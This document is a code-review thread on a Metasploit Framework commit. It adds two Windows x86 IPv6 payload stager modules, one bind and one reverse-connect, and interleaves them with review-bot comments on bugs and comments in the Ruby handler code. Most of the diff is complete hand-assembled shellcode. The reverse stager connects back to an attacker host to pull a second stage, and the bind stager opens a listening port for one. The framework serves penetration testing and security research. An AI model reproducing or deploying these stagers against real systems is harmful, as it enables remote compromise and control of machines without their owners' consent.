Msf::Module if ((val = datastore[name])) if (pack == 'ADDR') val = Rex::Socket.resolv_nbo(val) + + # Someone gave us a funky address (ipv6?) + if(val.length == 4) + raise RuntimeError, "IPv6 address specified for IPv4 payload" + end + elsif (pack == 'ADDR6') + val = Rex::Socket.resolv_nbo(val) + + # Convert v4 to the v6ish address + if(val.length == 4) + nip = "fe80::5efe:" + val.unpack("C*").join(".") + val = Rex::Socket.resolv_nbo(val) + end elsif (pack == 'RAW') # Just use the raw value... else 
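Review bot: `push byte 0x07 ; load five functions by hash` in `LLoadWinsock` says five but loads seven (the table grew by accept/bind/listen), and the `LRecvLength` comment `recv(s, buff, 4, 0)` does not match `push dword 4096`; write `; load seven functions by hash` and `; recv(s, buff, 4096, 0)`. The comments in `LKernel32Base` spell `kerne32.dll`. In `LFnd`, `mov cx, [ebx + 2 * ecx]` writes only the low 16 bits of ecx and is correct only because ecx still holds the small name index from `LFnlp`; state it with `; cx = ordinal; upper half of ecx assumed 0 (NumberOfNames < 64K)`. The `LBind` block would read better with `; sockaddr_in6, 28 bytes, built on the stack` at its top since the field comments otherwise hang in the air.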
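Review bot: The listener now binds the wildcard address (`0.0.0.0` or `::0`) chosen from LHOST's family rather than LHOST itself, so the handler port is reachable on every interface of the host; the commented-out `'LocalHost' => datastore['LHOST']` this replaces did not say why the wildcard is preferred and the new comment should, e.g. `# Bind the ANY address of LHOST's family; LHOST is the address the target connects to and presumably need not be a local interface`. `Rex::Socket.resolv_nbo` performs name resolution here, so an unresolvable LHOST raises before the listener exists, which is acceptable but worth a note. The family test `addr.length == 4` is repeated twice more in payload.rb in this same commit; a small shared predicate would keep the three in step.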
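Review bot: In the `ADDR` branch the new guard `if(val.length == 4) raise RuntimeError, "IPv6 address specified for IPv4 payload"` is inverted: `resolv_nbo` returns 4 bytes for an IPv4 address, so every valid IPv4 value now raises; it should be `if(val.length != 4)` (16 bytes is the IPv6 case the comment describes). In the `ADDR6` branch the v4-to-v6 conversion builds `nip` and then resolves `val` again, so `nip` is unused and `val` stays 4 bytes; the line should be `val = Rex::Socket.resolv_nbo(nip)`. The enclosing `substitute_vars` continues outside the hunk, and the doc comment above it should also say that `ADDR` rejects IPv6 input and `ADDR6` accepts IPv4 by mapping it.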
diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb new file mode 100644 index 0000000000..7847754e2b --- /dev/null +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb 
@@ -0,0 +1,75 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' +require 'msf/core/handler/bind_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module BindTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def self.handler_type_alias + "bind_ipv6_tcp" + end + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Bind TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LPORT' => [ 253+1, 'n' ], + }, + 'Payload' => + "\xfc"+ + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ + "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ + "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ + "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ + "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+ 
+ "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+ + "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+ + "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+ + "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+ + "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+ + "\x00\x53\x57\xff\x55\x18\xff\xd3" + } + )) + end + +end + +end end end end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..54b24a002e --- /dev/null +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb 
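Review bot: The `Offsets` entry `'LPORT' => [ 253+1, 'n' ]` is a byte index into the hand-assembled bytes of stager_bind_ipv6_tcp_nx.asm (it lands on the `\xff\xff` placeholder of `push dword 0xffff0017`) and nothing records how it was derived, so any reassembly silently breaks it; add `# Offsets index into the assembled stager_bind_ipv6_tcp_nx.asm; re-derive after any change to that file`. The description `Listen for a connection over IPv6` could also state that the stager binds the IPv6 ANY address on LPORT, which is why this module registers no address option of its own.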
@@ -0,0 +1,81 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + +module Msf +module Payloads +module Stagers +module Windows + +module ReverseTcpIPv6 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + + def self.handler_type_alias + "reverse_ipv6_tcp" + end + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Reverse TCP Stager (IPv6)', + 'Version' => '$Revision$', + 'Description' => 'Connect back to the attacker over IPv6', + 'Author' => ['hdm', 'skape'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Convention' => 'sockedi', + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ 246+1, 'ADDR6' ], + 'LPORT' => [ 240+1, 'n' ], + 'SCOPEID' => [ 262+1, 'V' ] + }, + 'Payload' => + "\xfc" + + "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ + "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ + "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ + "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ + "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ + "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ + "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ + "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+ + "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+ + "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+ + "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+ + 
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+ + "\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+ + "\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+ + "\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+ + "\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+ + "\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3" + } + )) + register_options( + [ + OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) + ], self.class) + end + +end + +end end end end
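Review bot: The `SCOPEID` option description says `required for link-layer addresses`; the IPv6 term for the `fe80::/10` range the inline default uses is link-local, so `"The IPv6 Scope ID, required for link-local addresses"`. As in bind_ipv6_tcp.rb, the `Offsets` (`LPORT` 240+1, `LHOST` 246+1, `SCOPEID` 262+1) index into the inline `sockaddr_in6` that follows the `\xe8\x1c\x00\x00\x00` call in the bytes and should say so in a comment, since reassembling the stager shifts all three. The `register_options` call after `super` is unusual placement next to the other stagers in this commit; a one-line comment explaining that SCOPEID is stager-specific would justify it.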